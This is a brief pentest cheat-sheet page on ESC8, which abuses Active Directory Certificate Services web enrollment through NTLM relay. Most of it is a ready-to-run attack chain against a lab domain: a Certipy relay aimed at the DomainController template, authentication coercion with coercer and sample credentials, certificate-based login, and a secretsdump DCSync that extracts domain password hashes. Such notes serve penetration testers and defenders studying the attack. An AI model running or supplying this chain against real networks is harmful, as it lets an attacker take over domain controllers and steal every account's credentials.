ESC8
ADCS abuse with NTLM Relay
NTLM Relay is a MitM attack where an attacker pretends to be the server for the client and vice versa. ADCS support enrollment over HTTP which allows users to request certificates over HTTP.
We can relay HTTP NTLM authentication to a certificate enrollment interface. CA's web enrollment service provides web pages to interact with CA. Usually at http://<servername>/certsrv/certfnsh.asp
. These endpoints can be abused using authenicated sessions through NTLM Relay.
ESC8 Abuse
Start listening with Certipy
sudo certipy relay -target 172.16.19.5 -template DomainController
Then coerce using printerbug, petitpotam or coercer.
coercer coerce -l 172.16.19.19 -t 172.16.19.3 -u blwasp -p 'Password123!' -d lab.local -v
Authenticate
certipy auth -pfx lab-dc.pfx
DCSync
KRB5CCNAME=lab-dc.ccache secretsdump.py -k -no-pass lab-dc.lab.local
Last updated
Was this helpful?